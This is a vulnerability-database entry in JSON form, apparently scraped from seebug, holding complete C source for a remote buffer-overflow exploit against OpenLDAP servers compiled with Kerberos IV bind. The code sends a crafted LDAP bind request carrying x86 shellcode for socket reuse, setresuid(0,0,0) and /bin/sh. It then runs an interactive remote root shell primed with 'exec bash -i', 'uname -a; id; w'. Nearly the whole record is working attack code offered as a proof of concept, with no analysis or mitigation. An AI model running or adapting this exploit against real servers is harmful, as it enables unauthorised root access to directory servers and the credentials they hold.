Description
No description provided by source.
{"sourceData": "\n /*\r\n * openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\r\n *\r\n * Only works on servers compiled with\r\n * --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no]\r\n *\r\n * by Solar Eclipse <solareclipse@phreedom.org>\r\n *\r\n * Shoutouts to LSD for their l33t asm code and to all 0dd people\r\n *\r\n * Private 0dd code.\r\n *\r\n */\r\n\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <errno.h>\r\n#include <stdio.h>\r\n\r\nextern int errno;\r\n\r\n#define SHELLCODE_LEN (1250+2+32)\r\n#define SHELLCODE_ADDR 0xbf5feed0\r\n\r\n#define LDAP_AUTH_SIMPLE\t0x80U\r\n#define LDAP_AUTH_KRBV41\t0x81U\r\n\r\n#define FINDSCKPORTOFS 46\r\n\r\nu_char shellcode[]=\r\n/* 72 bytes findsckcode by LSD-pl */\r\n "\\x31\\xdb" /* xorl %ebx,%ebx */\r\n "\\x89\\xe7" /* movl %esp,%edi */\r\n "\\x8d\\x77\\x10" /* leal 0x10(%edi),%esi */\r\n "\\x89\\x77\\x04" /* movl %esi,0x4(%edi) */\r\n "\\x8d\\x4f\\x20" /* leal 0x20(%edi),%ecx */\r\n "\\x89\\x4f\\x08" /* movl %ecx,0x8(%edi) */\r\n "\\xb3\\x10" /* movb $0x10,%bl */\r\n "\\x89\\x19" /* movl %ebx,(%ecx) */\r\n "\\x31\\xc9" /* xorl %ecx,%ecx */\r\n "\\xb1\\xff" /* movb $0xff,%cl */\r\n "\\x89\\x0f" /* movl %ecx,(%edi) */\r\n "\\x51" /* pushl %ecx */\r\n "\\x31\\xc0" /* xorl %eax,%eax */\r\n "\\xb0\\x66" /* movb $0x66,%al */\r\n "\\xb3\\x07" /* movb $0x07,%bl */\r\n "\\x89\\xf9" /* movl %edi,%ecx */\r\n "\\xcd\\x80" /* int $0x80 */\r\n "\\x59" /* popl %ecx */\r\n "\\x31\\xdb" /* xorl %ebx,%ebx */\r\n "\\x39\\xd8" /* cmpl %ebx,%eax */\r\n "\\x75\\x0a" /* jne <findsckcode+54> */\r\n "\\x66\\xb8\\x12\\x34" /* movw $0x1234,%bx */\r\n "\\x66\\x39\\x46\\x02" /* cmpw %bx,0x2(%esi) */\r\n "\\x74\\x02" /* je <findsckcode+56> */\r\n "\\xe2\\xe0" /* loop <findsckcode+24> */\r\n "\\x89\\xcb" /* movl %ecx,%ebx */\r\n "\\x31\\xc9" /* xorl %ecx,%ecx */\r\n "\\xb1\\x03" /* movb $0x03,%cl */\r\n "\\x31\\xc0" /* xorl %eax,%eax */\r\n "\\xb0\\x3f" /* movb $0x3f,%al */\r\n "\\x49" /* decl %ecx */\r\n "\\xcd\\x80" /* int $0x80 */\r\n "\\x41" /* incl %ecx */\r\n "\\xe2\\xf6" /* loop <findsckcode+62> */\r\n\r\n/* 10 byte setresuid(0,0,0); by core */\r\n "\\x31\\xc9" /* xor %ecx,%ecx */\r\n "\\xf7\\xe1" /* mul %ecx,%eax */\r\n "\\x51" /* push %ecx */\r\n "\\x5b" /* pop %ebx */\r\n "\\xb0\\xa4" /* mov $0xa4,%al */\r\n "\\xcd\\x80" /* int $0x80 */\r\n\r\n/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */\r\n "\\x31\\xc0" /* xorl %eax,%eax */\r\n "\\x50" /* pushl %eax */\r\n "\\x68""//sh" /* pushl $0x68732f2f */\r\n "\\x68""/bin" /* pushl $0x6e69622f */\r\n "\\x89\\xe3" /* movl %esp,%ebx */\r\n "\\x50" /* pushl %eax */\r\n "\\x53" /* pushl %ebx */\r\n "\\x89\\xe1" /* movl %esp,%ecx */\r\n "\\x99" /* cdql */\r\n "\\xb0\\x0b" /* movb $0x0b,%al */\r\n "\\xcd\\x80" /* int $0x80 */\r\n;\r\n\r\n#define COMMAND1 "echo 'a'; TERM=xterm; export TERM=xterm; exec bash -i;\\n"\r\n#define COMMAND2 "uname -a; id; w;\\n"\r\n\r\n/* mixter's code w/enhancements by core */\r\n\r\nint sh(int sockfd) {\r\n char snd[1024], rcv[1024];\r\n fd_set rset;\r\n int maxfd, n;\r\n\r\n /* Priming commands */\r\n strcpy(snd, COMMAND1 "\\n");\r\n write(sockfd, snd, strlen(snd));\r\n\r\n strcpy(snd, COMMAND2 "\\n");\r\n write(sockfd, snd, strlen(snd));\r\n\r\n /* Main command loop */\r\n for (;;) {\r\n FD_SET(fileno(stdin), &rset);\r\n FD_SET(sockfd, &rset);\r\n \r\n maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;\r\n select(maxfd, &rset, NULL, NULL, NULL);\r\n \r\n if (FD_ISSET(fileno(stdin), &rset)) {\r\n\t bzero(snd, sizeof(snd));\r\n\t fgets(snd, sizeof(snd)-2, stdin);\r\n\t write(sockfd, snd, strlen(snd));\r\n }\r\n \r\n if (FD_ISSET(sockfd, &rset)) {\r\n\t bzero(rcv, sizeof(rcv));\r\n\t \r\n\t if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {\r\n\t printf("Good Bye!\\n");\r\n\t return 0;\r\n\t }\r\n\t \r\n\t if (n < 0) {\r\n\t perror("read");\r\n\t return 1;\r\n\t }\r\n\t \r\n\t fputs(rcv, stdout);\r\n\t fflush(stdout); /* keeps output nice */\r\n }\r\n } /* for(;;) */\r\n}\r\n\r\n/* Connect to the host */\r\nint connect_host(char* host, int port)\r\n{\r\n\tstruct sockaddr_in s_in;\r\n\tint sock;\r\n\r\n\ts_in.sin_family = AF_INET;\r\n\ts_in.sin_addr.s_addr = inet_addr(host);\r\n\ts_in.sin_port = htons(port);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {\r\n\t\tprintf("Could not create a socket\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {\r\n\t\tprintf("Connection to %s:%d failed: %s\\n", host, port, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn sock;\r\n}\r\n\r\nint get_local_port(int sock)\r\n{\r\n\tstruct sockaddr_in s_in;\r\n\tint namelen = sizeof(s_in);\r\n\t\r\n\tif (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {\r\n\t\tprintf("Can't get local port: %s\\n", strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn s_in.sin_port;\r\n}\r\n\r\nint read_data(int sock, char* buf, int len)\r\n{\r\n\tint l;\r\n\tint to_read = len;\r\n\r\n\tdo {\r\n\t\tif ((l = read(sock, buf, to_read)) < 0) {\r\n\t\t\tprintf("Error in read: %s\\n", strerror(errno));\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tto_read -= len;\r\n\t} while (to_read > 0);\r\n\r\n\treturn len;\r\n}\r\n\r\nint read_bind_result(int sock)\r\n{\r\n\tchar buf[1000];\r\n\r\n\tread_data(sock, buf, 2);\r\n\tif (buf[0] != 0x30) {\r\n\t\t/* openldap is 0wned :-P */\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tread_data(sock, &buf[2], buf[1]);\r\n\t\r\n\tif ((buf[2] != 0x02) && (buf[3] != 0x01)) {\t/* message id */\r\n\t\tprintf("Malformed bind result\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (buf[5] != 0x61) {\t\t\t\t\t\t/* message type */\r\n\t\tprintf("Malformed bind result\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (buf[6] < 7) {\t\t\t\t\t\t\t/* message length */\r\n\t\tprintf("Malformed bind result\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif ((buf[7] != 0x0a) && (buf[8] != 0x01)) {\t/* result code */\r\n\t\tprintf("Malformed bind result\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\treturn buf[9];\t\t/* result code */\r\n}\r\n\r\nint send_bind_request(int sock, char method, char* dn, char* cred)\r\n{\r\n\tint cred_len, message_len, request_len;\r\n\tchar krb_bind_request[2000];\r\n\tchar* p;\r\n\r\n\tmemcpy(krb_bind_request,\r\n\t\t"\\x30\\x82\\xff\\xff"\t/* request length */\r\n\t\t"\\x02\\x01\\x01"\t\t/* message id = 1 */\r\n\t\t"\\x60"\t\t\t\t/* bind request */\r\n\t\t"\\x82\\xff\\xff"\t\t/* message length */\r\n\t\t"\\x02\\x01\\x02"\t\t/* LDAP version 3 */\r\n\t\t"\\x04",\t\t\t\t/* dn */\r\n\t15);\r\n\t\r\n\tp = &krb_bind_request[15];\r\n\t\r\n\tif (strlen(dn) > 255) {\r\n\t\tprintf("bind_dn too long\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t*p++ = (char)strlen(dn);\r\n\tstrcpy(p, dn);\r\n\r\n\tp += strlen(dn);\r\n\t\r\n\t*p++ = method;\t\t/* authentication method */\r\n\t*p++ = '\\x82';\r\n\r\n\tcred_len = strlen(cred);\r\n\t\r\n\t*p++ = (char) ((cred_len >> 8) & 0xff);\r\n\t*p++ = (char) (cred_len & 0xff);\r\n\t\r\n\tstrcpy(p, cred);\r\n\t\r\n\tmessage_len = 5 + strlen(dn) + 4 + cred_len;\r\n\tkrb_bind_request[9] = (char) ((message_len >> 8) & 0xff);\r\n\tkrb_bind_request[10] = (char) (message_len & 0xff);\r\n\r\n\trequest_len = 7 + message_len;\r\n\tkrb_bind_request[2] = (char) ((request_len >> 8) & 0xff);\r\n\tkrb_bind_request[3] = (char) (request_len & 0xff);\r\n\t\r\n\tsend(sock, krb_bind_request, 4+request_len, 0);\r\n}\r\n\r\nvoid build_shellcode(char* p, int len)\r\n{\r\n\tint i;\r\n\r\n\ti = len - 64 - strlen(shellcode);\r\n\tmemset(p, 0x90, i);\r\n\tstrncpy(&p[i], shellcode, strlen(shellcode));\r\n\r\n\tfor (i = len - 64; i < len; i+= 4) {\r\n\t\t*(int*)&p[i] = SHELLCODE_ADDR;\r\n\t}\r\n}\r\n\r\nchar res_buf[30];\r\n\r\nchar* ldap_result(int code) {\r\n\tswitch (code) {\r\n\t\tcase 0x00:\treturn "LDAP_SUCCESS (0x00)";\r\n\t\tcase 0x01:\treturn "LDAP_OPERATIONS_ERROR (0x01)";\r\n\t\tcase 0x02:\treturn "LDAP_PROTOCOL_ERROR (0x02)";\r\n\t\tcase 0x07:\treturn "LDAP_AUTH_METHOD_NOT_SUPPORTED (0x07)\\nMost likely cause: the OpenLDAP server was not compiled with --enable-kbind.";\r\n\t\tcase 0x08:\treturn "LDAP_STRONG_AUTH_REQUIRED (0x08)";\r\n\t\tcase 0x0e:\treturn "LDAP_SASL_BIND_IN_PROGRESS (0x0e)";\r\n\t\tcase 0x22:\treturn "LDAP_INVALID_DN_SYNTAX (0x22)\\nCheck your bind_dn.";\r\n\t\tcase 0x30:\treturn "LDAP_INAPPROPRIATE_AUTH (0x30)";\r\n\t\tcase 0x31:\treturn "LDAP_INVALID_CREDENTIALS (0x31)\\nThe bind_dn must exist in the LDAP directory.";\r\n\t\tcase 0x32:\treturn "LDAP_INSUFFICIENT_ACCESS (0x32)";\r\n\t\tcase 0x33:\treturn "LDAP_BUSY (0x33)";\r\n\t\tcase 0x34:\treturn "LDAP_UNAVAILABLE (0x34)";\r\n\t\tcase 0x35:\treturn "LDAP_UNWILLING_TO_PERFORM (0x35)";\r\n\t\tcase 0x50:\treturn "LDAP_OTHER (0x50)";\r\n\t\tcase 0x51:\treturn "LDAP_SERVER_DOWN (0x51)";\r\n\t\tcase 0x54:\treturn "LDAP_DECODING_ERROR (0x54)";\r\n\tdefault:\r\n\t\tsprintf(res_buf, "%x", code);\r\n\t\treturn res_buf;\r\n\t}\r\n}\r\n\r\n/* run, code, run */\r\nint main(int argc, char* argv[])\r\n{\r\n\tchar shellcode_buf[SHELLCODE_LEN+1];\r\n\tint port, sock, res;\r\n\tchar* dn;\r\n\tchar* p;\r\n\r\n\tprintf(": openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\\n");\r\n\tprintf("\\n");\r\n\tprintf(": Only works on servers compiled with\\n");\r\n\tprintf(" --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no]\\n");\r\n\tprintf("\\n");\r\n\tprintf(": by Solar Eclipse <solareclipse@phreedom.org>\\n\\n");\r\n\t\r\n\tif (argc < 3) {\r\n\t\tprintf(": Usage: %s hostname bind_dn\\n", argv[0]);\r\n\t\tprintf(" The bind_dn must exist in the LDAP directory.\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tdn = argv[2];\r\n\r\n\tport = 389; /*atoi(argv[2]);*/\r\n\tsock = connect_host(argv[1], port);\r\n\r\n/*\r\n\tsend_bind_request(sock, LDAP_AUTH_SIMPLE, dn, "secret");\r\n\tres = read_bind_result(sock);\r\n\tprintf("LDAP_AUTH_SIMPLE bind request returned %s\\n", ldap_result(res));\r\n*/\r\n\r\n/*\tsend_bind_request(sock, LDAP_AUTH_KRBV41, dn, "secret");\r\n\tres = read_bind_result(sock);\r\n\tprintf("LDAP_AUTH_KRBV41 bind request returned %s\\n", ldap_result(res));\t\r\n*/\r\n\tport = get_local_port(sock);\r\n\r\n\tshellcode[FINDSCKPORTOFS] = (char) (port & 0xff);\r\n\tshellcode[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);\r\n\r\n\tbuild_shellcode(shellcode_buf, SHELLCODE_LEN);\r\n\tshellcode_buf[SHELLCODE_LEN] = '\\0';\r\n\r\n\tprintf("Sending shellcode\\n");\r\n\tsend_bind_request(sock, LDAP_AUTH_KRBV41, dn, shellcode_buf);\r\n\t\r\n\tsleep(2);\r\n\r\n\t/* Priming commands */\r\n\twrite(sock, "echo 'a';\\n", 10);\r\n\r\n\tprintf("Reading bind result\\n");\r\n\tres = read_bind_result(sock);\r\n\tif (res > 0)\r\n\t\tprintf("LDAP_AUTH_KRBV41 bind request returned %s\\n", ldap_result(res));\r\n\telse {\r\n\t\tprintf("Spawning shell...\\n");\r\n\t\tsh(sock);\r\n\t}\r\n\r\n\tclose(sock);\r\n\t\r\n\treturn 0;\r\n}\r\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-5828", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-5828", "type": "seebug", "viewCount": 37, "references": [], "lastseen": "2017-11-19T22:16:29", "published": "2006-12-16T00:00:00", "cvelist": [], "id": "SSV:5828", "enchantments_done": [], "modified": "2006-12-16T00:00:00", "title": "OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645357372, "score": 1659785532, "epss": 1678851499}}
{}
OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit